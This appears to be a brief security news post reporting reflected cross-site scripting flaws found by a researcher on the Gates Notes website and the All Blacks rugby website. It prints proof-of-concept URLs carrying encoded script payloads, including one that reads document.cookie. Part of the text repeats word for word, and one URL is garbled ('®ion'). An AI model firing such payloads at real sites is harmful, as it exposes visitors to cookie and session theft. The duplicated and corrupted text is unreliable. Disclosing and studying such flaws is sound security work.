Security Researcher Fabián Cuchietti come with some interesting xss finds, this time he discovered XSS vulnerability in the official website of Bill gates (www.thegatesnotes.com)
Also he discovered xss vulnerability in the Official website of the All Blacks rugby team of New Zealand.
Poc:
http://www.thegatesnotes.com/sitecore/service/noaccess.aspx?item=&site=1%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&user=sitecore/Anonymous
http://www.allblacks.com/index.cfm?layout=search&searchmultimedia=1®ion=&searchKeyword=%22%3E%3Ciframe%20onload%3Dalert%28%2FXSS%2F%29%3E&Submit=Go
Also he discovered xss vulnerability in the Official website of the All Blacks rugby team of New Zealand.
Poc:
http://www.thegatesnotes.com/sitecore/service/noaccess.aspx?item=&site=1%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E&user=sitecore/Anonymous
http://www.allblacks.com/index.cfm?layout=search&searchmultimedia=1®ion=&searchKeyword=%22%3E%3Ciframe%20onload%3Dalert%28%2FXSS%2F%29%3E&Submit=Go